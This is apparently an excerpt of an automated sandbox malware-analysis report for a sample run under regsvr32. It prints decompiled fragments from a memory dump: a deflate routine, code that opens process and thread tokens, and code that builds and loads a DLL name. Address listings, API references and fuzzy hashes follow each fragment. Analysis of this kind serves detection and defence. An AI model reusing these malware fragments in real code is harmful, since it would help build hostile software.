					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0xee85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x8508458b
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0x51ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E03176020(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0x51ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x5d08408b
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0xee85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0xee85000
							E03177180(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E03175EE0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0xee85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































            0x03174166
            0x0317416b
            0x0317416f
            0x03174172
            0x03174172
            0x03174175
            0x0317417a
            0x0317417f
            0x03174182
            0x03174187
            0x0317418a
            0x03174190
            0x03174190
            0x0317419b
            0x0317419e
            0x031741a5
            0x031741aa
            0x00000000
            0x00000000
            0x031741b0
            0x031741b5
            0x031741b5
            0x031741ba
            0x031741c0
            0x031741ca
            0x031741cf
            0x031741d5
            0x031741f4
            0x031741f7
            0x03174202
            0x03174202
            0x03174202
            0x031741f9
            0x031741f9
            0x031741fb
            0x00000000
            0x031741fd
            0x031741fd
            0x031741fd
            0x031741fb
            0x0317420a
            0x0317420f
            0x03174214
            0x0317421a
            0x0317421e
            0x03174221
            0x03174224
            0x0317422a
            0x0317422f
            0x03174232
            0x03174238
            0x0317423d
            0x03174243
            0x03174249
            0x0317424e
            0x03174251
            0x03174256
            0x0317425a
            0x0317425e
            0x03174261
            0x03174264
            0x0317426d
            0x03174274
            0x03174277
            0x0317427a
            0x0317427f
            0x03174284
            0x03174287
            0x0317428a
            0x0317428a
            0x0317428e
            0x03174297
            0x0317429e
            0x031742a1
            0x031742a6
            0x031742ab
            0x031742ab
            0x031742ae
            0x031742b3
            0x00000000
            0x00000000
            0x031741d7
            0x031741d9
            0x031741e6
            0x00000000
            0x00000000
            0x031741e6
            0x031741d9
            0x00000000
            0x031741d5
            0x031742b9
            0x031742be
            0x031742c1
            0x031742c4
            0x0317436f
            0x0317436f
            0x031742ca
            0x031742ca
            0x031742ca
            0x031742cf
            0x031742f9
            0x031742fc
            0x031742fc
            0x03174301
            0x03174303
            0x03174305
            0x03174308
            0x0317430b
            0x03174313
            0x03174318
            0x03174318
            0x0317431e
            0x03174321
            0x03174324
            0x03174327
            0x03174329
            0x03174329
            0x0317432a
            0x0317432a
            0x03174327
            0x03174338
            0x0317433b
            0x0317433f
            0x03174344
            0x03174347
            0x0317434a
            0x0317434a
            0x0317434a
            0x0317434d
            0x0317434d
            0x03174350
            0x03174350
            0x031742d1
            0x031742d1
            0x031742e1
            0x031742e4
            0x031742e9
            0x031742e9
            0x031742ec
            0x031742ef
            0x031742f2
            0x031742f4
            0x031742f4
            0x03174353
            0x03174355
            0x03174358
            0x03174358
            0x0317435e
            0x03174362
            0x03174365
            0x03174367
            0x03174367
            0x03174378
            0x0317437a
            0x0317437a
            0x03174382
            0x03174390
            0x03174393
            0x03174395
            0x031743b5
            0x031743b5
            0x031743b8
            0x031743be
            0x031743bf
            0x031743c2
            0x031743c4
            0x031743c7
            0x031743ca
            0x031743cd
            0x031743d1
            0x031743d4
            0x031743d7
            0x031743da
            0x031743dc
            0x031743dc
            0x031743df
            0x031743e1
            0x031743e1
            0x031743e4
            0x031743e6
            0x031743e9
            0x031743f1
            0x031743f4
            0x031743f9
            0x031743f9
            0x031743ff
            0x03174402
            0x03174405
            0x03174407
            0x03174407
            0x03174408
            0x03174408
            0x03174413
            0x03174413
            0x03174413
            0x03174416
            0x03174419
            0x03174419
            0x0317441c
            0x0317441c
            0x031743df
            0x0317441f
            0x03174422
            0x03174425
            0x03174427
            0x0317442a
            0x0317442c
            0x0317442f
            0x03174432
            0x03174434
            0x03174437
            0x0317443f
            0x03174447
            0x0317444a
            0x0317444a
            0x0317444a
            0x0317444d
            0x0317444d
            0x0317444d
            0x03174450
            0x03174456
            0x03174458
            0x03174458
            0x0317445e
            0x03174464
            0x0317446d
            0x03174474
            0x03174476
            0x03174479
            0x03174479
            0x0317447c
            0x0317447c
            0x0317447f
            0x03174481
            0x03174484
            0x03174486
            0x031744a1
            0x031744a1
            0x031744a5
            0x031744a8
            0x031744ab
            0x031744ae
            0x031744c4
            0x031744c4
            0x031744c4
            0x031744b0
            0x031744b0
            0x031744b2
            0x031744b6
            0x031744b9
            0x00000000
            0x031744bb
            0x031744bb
            0x031744bd
            0x00000000
            0x031744bf
            0x031744bf
            0x031744bf
            0x031744bd
            0x031744b9
            0x031744c8
            0x031744cb
            0x031744d0
            0x031744da
            0x031744da
            0x031744da
            0x031744dd
            0x03174488
            0x03174488
            0x0317448a
            0x03174491
            0x03174491
            0x03174493
            0x03174495
            0x03174497
            0x0317449b
            0x0317449d
            0x0317449f
            0x00000000
            0x00000000
            0x0317449f
            0x0317449b
            0x0317448c
            0x0317448c
            0x0317448f
            0x00000000
            0x00000000
            0x0317448f
            0x0317448a
            0x031744e7
            0x031744e9
            0x031744e9
            0x031744f4
            0x03174397
            0x03174397
            0x0317439a
            0x00000000
            0x0317439c
            0x0317439c
            0x0317439e
            0x031743a2
            0x00000000
            0x031743a4
            0x031743a4
            0x031743a4
            0x031743a7
            0x00000000
            0x031743ab
            0x031743b4
            0x031743b4
            0x031743a7
            0x031743a2
            0x0317439a
            0x03174386
            0x0317438f
            0x0317438f

            APIs
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: memcpy
            • String ID:
            • API String ID: 3510742995-0
            • Opcode ID: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
            • Instruction ID: 035755980a380ad09e7446e3804e4b9f003d7d69752c7ab610afd9144e1ae051
            • Opcode Fuzzy Hash: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
            • Instruction Fuzzy Hash: FBD1F275A007009FCB24CF6ED8D496AB7F5BF88304B28896DE88ACB751DB31E945CB54
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316C92F Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0316C92F(void* __ecx) {
				void* _v8;
				void* _t10;
				intOrPtr _t13;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
					L4:
					_t10 = _v8;
				} else {
					if(GetLastError() != 0x3f0) {
						L3:
						_t10 = 0;
					} else {
						_t13 =  *0x317f8d0; // 0x4faf8c0
						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				return _t10;
			}






            0x0316c94e
            0x0316c980
            0x0316c980
            0x0316c950
            0x0316c95b
            0x0316c97c
            0x0316c97c
            0x0316c95d
            0x0316c967
            0x0316c97a
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0316c97a
            0x0316c95b
            0x0316c985

            APIs
            • GetCurrentThread.KERNEL32 ref: 0316C942
            • OpenThreadToken.ADVAPI32(00000000,?,?,0316CA74,00000000,03160000), ref: 0316C949
            • GetLastError.KERNEL32(?,?,0316CA74,00000000,03160000), ref: 0316C950
            • OpenProcessToken.ADVAPI32(00000000,?,?,0316CA74,00000000,03160000), ref: 0316C975
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: OpenThreadToken$CurrentErrorLastProcess
            • String ID:
            • API String ID: 1515895013-0
            • Opcode ID: b44456d126d22df2ae10ccfc255201831021373ec9cb0f5bed033035d25cbca3
            • Instruction ID: 11f16a38663d8e5f50e30e1ef7bda8dab1350d1f9c33b6b6edbd3df87cc43752
            • Opcode Fuzzy Hash: b44456d126d22df2ae10ccfc255201831021373ec9cb0f5bed033035d25cbca3
            • Instruction Fuzzy Hash: A4F01732A01205EBDB04ABF49809BAA73FCFB0C300F090490E682D3094D760E9958BA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316D309 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 89%
            			E0316D309(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				intOrPtr _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x317f8d4; // 0x4fafc00
				_t1 = _t50 + 0x1898; // 0x0
				_t14 =  *_t1;
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E03169F85(_t50, 0xb9d);
					_t66 =  *0x317f8d4; // 0x4fafc00
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E03169FE4( &_v140, 0x40, L"%08x", E0316E34A(_t66 + 0xb0, E0316A5D0(_t66 + 0xb0), 0));
					_t20 =  *0x317f8d4; // 0x4fafc00
					_t7 = _t20 + 0xa8; // 0x1
					asm("sbb eax, eax");
					_t25 = E03169F85(_t67, ( ~( *_t7) & 0xfffffeb6) + 0xded);
					_t26 =  *0x317f8d4; // 0x4fafc00
					_t68 = E03169C50(_t26 + 0x1020);
					_v12 = _t68;
					E03168D9A( &_v8);
					_t32 =  *0x317f8d4; // 0x4fafc00
					_t34 = E03169C50(_t32 + 0x122a);
					 *0x317f9d4 = _t34;
					_t35 =  *0x317f8d0; // 0x4faf8c0
					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x317c9d8,  &_v140, ".", L"dll", 0, 0x317c9d8, _t25, 0x317c9d8, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x317f9d4);
					 *0x317f9cc = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E0316F08E(0x317cbc4, _t60);
					}
					 *0x317f9d0 = _t38;
					E03168DDF( &_v12, 0xfffffffe);
					E03168F63( &_v140, 0, 0x80);
					if( *0x317f9d0 != 0) {
						goto L10;
					} else {
						E03168DDF(0x317f9d4, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x317f9d0 == 0) {
						_t46 =  *0x317f908; // 0x4fafa00
						 *0x317f9d0 = _t46;
					}
					L10:
					return 1;
				}
			}

























            0x0316d309
            0x0316d309
            0x0316d309
            0x0316d30c
            0x0316d318
            0x0316d318
            0x0316d323
            0x0316d33f
            0x0316d344
            0x0316d34d
            0x0316d34f
            0x0316d357
            0x0316d378
            0x0316d37d
            0x0316d382
            0x0316d38a
            0x0316d397
            0x0316d3a5
            0x0316d3b6
            0x0316d3bc
            0x0316d3bf
            0x0316d3d6
            0x0316d3e2
            0x0316d3ea
            0x0316d3f1
            0x0316d3f7
            0x0316d403
            0x0316d409
            0x0316d410
            0x0316d423
            0x0316d412
            0x0316d412
            0x0316d415
            0x0316d41b
            0x0316d420
            0x0316d425
            0x0316d430
            0x0316d442
            0x0316d454
            0x00000000
            0x0316d456
            0x0316d45d
            0x00000000
            0x0316d463
            0x0316d464
            0x0316d464
            0x0316d46b
            0x0316d46d
            0x0316d472
            0x0316d472
            0x0316d477
            0x0316d47b
            0x0316d47b

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID: %08x$dll
            • API String ID: 1029625771-2963171978
            • Opcode ID: 27d49138d3ea75184538cf973bd1621f0dadada68fb2bfae8f3858b7cbefb43e
            • Instruction ID: d601b9fd65cb9b80c179cb5823fa17083439b63ca64a8c85fc0cec3005f22ada
            • Opcode Fuzzy Hash: 27d49138d3ea75184538cf973bd1621f0dadada68fb2bfae8f3858b7cbefb43e
            • Instruction Fuzzy Hash: 683170B6A04204BFDB14EBA8EC45FAB76BCEB4D714F1C41A6F105EB184DB3499E18760
            Uniqueness

            Uniqueness Score: -1.00%

            Function 031736D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55stringCOMMON
            Download Yara Rule
            C-Code - Quality: 47%
            			E031736D5(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v5;
				long long _v12;
				short _v20;
				signed int _t15;
				void* _t16;
				signed int _t22;
				char _t25;
				void* _t26;
				signed int _t28;
				intOrPtr _t29;
				void* _t31;
				char** _t32;
				long long _t40;
				long long _t41;

				_t40 = __fp0;
				_t15 = E031735EE(_a4);
				 *_t32 = "msxml32.dll";
				_t28 = _t15 & 0x0fffffff;
				_t16 = E0316A5D0();
				_t26 = 0xf;
				_t25 = 0;
				_v5 = 0;
				if(_t16 > _t26) {
					L2:
					_t3 = _t25 + 0x41; // 0x41
					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
					_t25 = _t25 + 1;
				} else {
					_t26 = _t16;
					if(_t26 != 0) {
						do {
							goto L2;
						} while (_t25 < _t26);
					}
				}
				lstrlenW( &_v20);
				_t29 = _a8;
				_t22 = _a12 - _t29 + 1;
				_a12 = _t22;
				asm("fild dword [ebp+0x10]");
				if(_t22 < 0) {
					_t40 = _t40 +  *0x317cf90;
				}
				_a12 = _t28;
				_v12 = _t40;
				_t41 = _v12;
				asm("fild dword [ebp+0x10]");
				if(_t28 < 0) {
					_t41 = _t41 +  *0x317cf90;
				}
				_v12 = _t41;
				asm("fmulp st1, st0");
				L03178995();
				return _t29 - _t22;
			}

















            0x031736d5
            0x031736e0
            0x031736e7
            0x031736ee
            0x031736f4
            0x031736fc
            0x031736fd
            0x031736ff
            0x03173704
            0x0317370c
            0x0317370c
            0x0317370f
            0x03173713
            0x03173706
            0x03173706
            0x0317370a
            0x0317370c
            0x00000000
            0x00000000
            0x0317370c
            0x0317370a
            0x0317371c
            0x03173725
            0x0317372a
            0x0317372d
            0x03173730
            0x03173733
            0x03173735
            0x03173735
            0x0317373b
            0x0317373e
            0x03173741
            0x03173744
            0x03173749
            0x0317374b
            0x0317374b
            0x03173751
            0x0317375d
            0x0317375f
            0x0317376b

            APIs
            • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 0317371C
            • _ftol2_sse.MSVCRT ref: 0317375F
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: _ftol2_sselstrlen
            • String ID: msxml32.dll
            • API String ID: 1292649733-2051705522
            • Opcode ID: 5a6dba824ba9d71284d691d83037f5d7e1071b6e5551da38815aa5b0ef67dd5e
            • Instruction ID: 64b78aaa53612f619d6b3ecd63e36efc3d345e629a4d756497aa9ca72a0baf3c
            • Opcode Fuzzy Hash: 5a6dba824ba9d71284d691d83037f5d7e1071b6e5551da38815aa5b0ef67dd5e
            • Instruction Fuzzy Hash: AC11C27AA00249ABCF04EF69E8044DE7FB5FF8C310F2E4999D864D6249EB30C1659795
            Uniqueness

            Uniqueness Score: -1.00%

            Execution Graph

            Execution Coverage:6.1%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:0%
            Total number of Nodes:2000
            Total number of Limit Nodes:52
            execution_graph 13945 34657c3 13964 3469eab 13945->13964 13948 34658c4 13950 34657f2 13950->13948 13951 3469f6b 2 API calls 13950->13951 13952 346580a 13951->13952 13953 3469fa5 2 API calls 13952->13953 13954 346581f 13953->13954 13955 3468d87 2 API calls 13954->13955 13956 3465827 13955->13956 13957 3468ddf 2 API calls 13956->13957 13958 3465842 13957->13958 13959 346b787 2 API calls 13958->13959 13961 3465850 13959->13961 13960 346c402 11 API calls 13960->13961 13961->13960 13962 34658b9 13961->13962 13963 3468ddf 2 API calls 13962->13963 13963->13948 13965 34698e9 2 API calls 13964->13965 13966 3469ecc 13965->13966 13967 3469c50 2 API calls 13966->13967 13968 34657db 13967->13968 13968->13948 13969 3468dc9 RtlAllocateHeap 13968->13969 13969->13950 13984 346fbd6 13987 3468dc9 RtlAllocateHeap 13984->13987 13986 346fbe6 13987->13986 13137 346225e 13138 34698e9 2 API calls 13137->13138 13139 3462295 13138->13139 13140 346bfc8 2 API calls 13139->13140 13141 34622ad 13140->13141 13142 34622b4 13141->13142 13159 346c4d1 memset 13141->13159 13144 3468ddf 2 API calls 13142->13144 13152 34623fe 13144->13152 13145 3462425 13146 3469e22 2 API calls 13145->13146 13149 3462432 13146->13149 13147 346241a 13151 3468ddf 2 API calls 13147->13151 13148 3469f85 2 API calls 13158 34622c4 13148->13158 13150 3468ddf 2 API calls 13150->13152 13151->13145 13152->13145 13152->13147 13152->13150 13153 3468ddf HeapFree memset 13153->13158 13154 346109a 2 API calls 13154->13158 13155 3469c50 RtlAllocateHeap lstrcatW 13155->13158 13156 3468d9a HeapFree memset 13156->13158 13157 346b787 memset GetExitCodeProcess 13157->13158 13158->13142 13158->13148 13158->13153 13158->13154 13158->13155 13158->13156 13158->13157 13174 3468dc9 RtlAllocateHeap 13159->13174 13161 346c4f8 13162 3469ab3 RtlAllocateHeap 13161->13162 13173 346c57c 13161->13173 13163 346c516 13162->13163 13164 3469ab3 RtlAllocateHeap 13163->13164 13165 346c529 13164->13165 13166 3469ab3 RtlAllocateHeap 13165->13166 13167 346c53d 13166->13167 13168 3469f85 2 API calls 13167->13168 13169 346c54a 13168->13169 13170 3468d9a 2 API calls 13169->13170 13171 346c570 13170->13171 13172 3469ab3 RtlAllocateHeap 13171->13172 13172->13173 13173->13158 13174->13161 13249 346286e 13250 3462964 13249->13250 13251 3462885 13249->13251 13253 3469e22 2 API calls 13250->13253 13252 346bfc8 2 API calls 13251->13252 13255 3462891 13252->13255 13254 3462970 13253->13254 13255->13250 13279 3469f14 13255->13279 13258 3468ddf 2 API calls 13258->13250 13259 3469b26 2 API calls 13260 34628b5 13259->13260 13283 346bf56 13260->13283 13262 34628c8 13263 3469b26 2 API calls 13262->13263 13275 346293d 13262->13275 13265 34628d4 13263->13265 13264 3468ddf 2 API calls 13266 346294b 13264->13266 13267 346109a 2 API calls 13265->13267 13268 3468ddf 2 API calls 13266->13268 13269 34628e0 13267->13269 13270 3462956 13268->13270 13271 3469c50 2 API calls 13269->13271 13270->13258 13272 34628f1 13271->13272 13273 3468d9a 2 API calls 13272->13273 13274 34628ff 13273->13274 13274->13275 13276 346b787 2 API calls 13274->13276 13275->13264 13277 346291d 13276->13277 13278 3468ddf 2 API calls 13277->13278 13278->13275 13280 3469f1d 13279->13280 13282 34628a3 13279->13282 13286 3468dc9 RtlAllocateHeap 13280->13286 13282->13259 13282->13270 13287 3468dc9 RtlAllocateHeap 13283->13287 13285 346bf7b 13285->13262 13286->13282 13287->13285 11200 3466603 11201 3466611 11200->11201 11206 3466669 11200->11206 11229 3468db4 HeapCreate 11201->11229 11203 3466616 11230 3469787 11203->11230 11213 3466664 11216 3468d9a 2 API calls 11213->11216 11214 346666e 11250 3468d9a 11214->11250 11216->11206 11222 34666c5 CreateThread 11222->11206 11330 34663a2 11222->11330 11223 346f0d9 8 API calls 11224 34666a0 11223->11224 11263 346647a memset 11224->11263 11229->11203 11282 3468dc9 RtlAllocateHeap 11230->11282 11232 346661b 11233 3473d36 11232->11233 11234 3473d6b 11233->11234 11283 3468e2e 11234->11283 11236 3466629 11237 346f0d9 11236->11237 11287 3469f6b 11237->11287 11240 346f103 LoadLibraryA 11242 346f10a 11240->11242 11241 346f0fb GetModuleHandleA 11241->11242 11243 346f118 11242->11243 11290 346f08e 11242->11290 11295 3468d87 11243->11295 11247 3469f85 11313 3468ca3 11247->11313 11249 3466650 GetFileAttributesW 11249->11213 11249->11214 11251 3466673 11250->11251 11252 3468da8 11250->11252 11254 346109a 11251->11254 11253 3468ddf 2 API calls 11252->11253 11253->11251 11255 3468ca3 2 API calls 11254->11255 11256 34610b5 11255->11256 11257 346fcda 11256->11257 11258 346fcf6 11257->11258 11259 3466687 11258->11259 11319 3468dc9 RtlAllocateHeap 11258->11319 11259->11222 11259->11223 11261 346fd09 11261->11259 11262 3468ddf 2 API calls 11261->11262 11262->11259 11320 3461080 11263->11320 11265 34664a6 11266 34664b7 11265->11266 11267 34664f8 11265->11267 11268 3461080 2 API calls 11266->11268 11269 3461080 2 API calls 11267->11269 11270 34664c1 11268->11270 11271 3466502 11269->11271 11323 3469fa5 11270->11323 11275 3468d87 2 API calls 11271->11275 11273 34664d7 11274 3468d87 2 API calls 11273->11274 11276 34664e2 11274->11276 11275->11276 11277 3468ddf 11276->11277 11278 34666b5 11277->11278 11280 3468de9 11277->11280 11278->11222 11279 3468f63 memset 11281 3468e19 HeapFree 11279->11281 11280->11278 11280->11279 11281->11278 11282->11232 11286 3468dc9 RtlAllocateHeap 11283->11286 11285 3468e3f 11285->11236 11286->11285 11299 3468bcd 11287->11299 11306 3468dc9 RtlAllocateHeap 11290->11306 11292 346f0a0 11294 346f0cf 11292->11294 11307 346ef38 11292->11307 11294->11243 11296 3468d8f 11295->11296 11297 346663f 11295->11297 11298 3468ddf 2 API calls 11296->11298 11297->11247 11298->11297 11301 3468be4 11299->11301 11304 3468c05 11299->11304 11300 3468c4c lstrlenW 11302 3468c58 11300->11302 11301->11304 11305 3468dc9 RtlAllocateHeap 11301->11305 11302->11240 11302->11241 11304->11300 11304->11302 11305->11304 11306->11292 11308 346efac 11307->11308 11309 346ef51 11307->11309 11308->11292 11309->11308 11310 346f004 LoadLibraryA 11309->11310 11310->11308 11311 346f012 GetProcAddress 11310->11311 11311->11308 11312 346f01e 11311->11312 11312->11308 11315 3468cc4 lstrlenW 11313->11315 11318 3468dc9 RtlAllocateHeap 11315->11318 11317 3468d4b 11317->11249 11317->11317 11318->11317 11319->11261 11321 3468bcd 2 API calls 11320->11321 11322 3461096 11321->11322 11322->11265 11327 3468f63 11323->11327 11326 3469fd3 11326->11273 11328 3468f6c memset 11327->11328 11329 3468f7d _vsnprintf 11327->11329 11328->11329 11329->11326 11342 346651e 11330->11342 11334 34663b3 11336 34663ed 11334->11336 11341 34663bd 11334->11341 11405 346d889 11334->11405 11337 3466424 11336->11337 11338 346641d 11336->11338 11337->11341 11445 3463597 11337->11445 11421 34661e8 11338->11421 11343 346f0d9 8 API calls 11342->11343 11344 3466532 11343->11344 11345 346f0d9 8 API calls 11344->11345 11346 346654b 11345->11346 11347 346f0d9 8 API calls 11346->11347 11348 3466564 11347->11348 11349 346f0d9 8 API calls 11348->11349 11350 346657d 11349->11350 11351 346f0d9 8 API calls 11350->11351 11352 3466598 11351->11352 11353 346f0d9 8 API calls 11352->11353 11354 34665b1 11353->11354 11355 346f0d9 8 API calls 11354->11355 11356 34665ca 11355->11356 11357 346f0d9 8 API calls 11356->11357 11358 34665e3 11357->11358 11359 346f0d9 8 API calls 11358->11359 11360 34663a7 GetOEMCP 11359->11360 11361 346dfc2 11360->11361 11452 3468dc9 RtlAllocateHeap 11361->11452 11363 346dfdd 11364 346dfe8 GetCurrentProcessId 11363->11364 11404 346e33d 11363->11404 11365 346e000 11364->11365 11453 346ca0a 11365->11453 11367 346e064 11469 346f3a0 11367->11469 11368 346e053 11368->11367 11460 346ca5a 11368->11460 11373 346e099 11374 346e0e3 GetLastError 11373->11374 11375 346e0e9 GetSystemMetrics 11373->11375 11374->11375 11376 346e110 11375->11376 11478 346c85a 11376->11478 11382 346e14b 11495 346c870 11382->11495 11387 3468f63 memset 11388 346e1a2 GetVersionExA 11387->11388 11514 346ddbe 11388->11514 11392 346e1c0 GetWindowsDirectoryW 11393 3469f85 2 API calls 11392->11393 11394 346e1e3 11393->11394 11395 3468d9a 2 API calls 11394->11395 11396 346e21d 11395->11396 11398 346e255 11396->11398 11537 3469fe4 11396->11537 11520 347357b 11398->11520 11404->11334 11615 346d7cd 11405->11615 11408 346d9d5 11408->11336 11410 346d9ca 11412 3468ddf 2 API calls 11410->11412 11411 346d9b8 11411->11410 11413 3468ddf 2 API calls 11411->11413 11412->11408 11413->11411 11414 3468f63 memset 11420 346d8c6 11414->11420 11417 346d939 GetLastError 11645 346dadc ResumeThread 11417->11645 11419 346d963 FindCloseChangeNotification 11419->11420 11420->11410 11420->11411 11420->11414 11420->11417 11420->11419 11627 346be10 11420->11627 11632 346d9de 11420->11632 11715 346a79b 11421->11715 11424 34661f7 11424->11341 11425 346620f 11731 346601d 11425->11731 11431 3466272 11766 34660d9 11431->11766 11432 3466223 11434 3466277 11432->11434 11438 3466228 11432->11438 11435 3466293 11434->11435 11444 3466270 11434->11444 11779 3470ac8 11434->11779 11435->11341 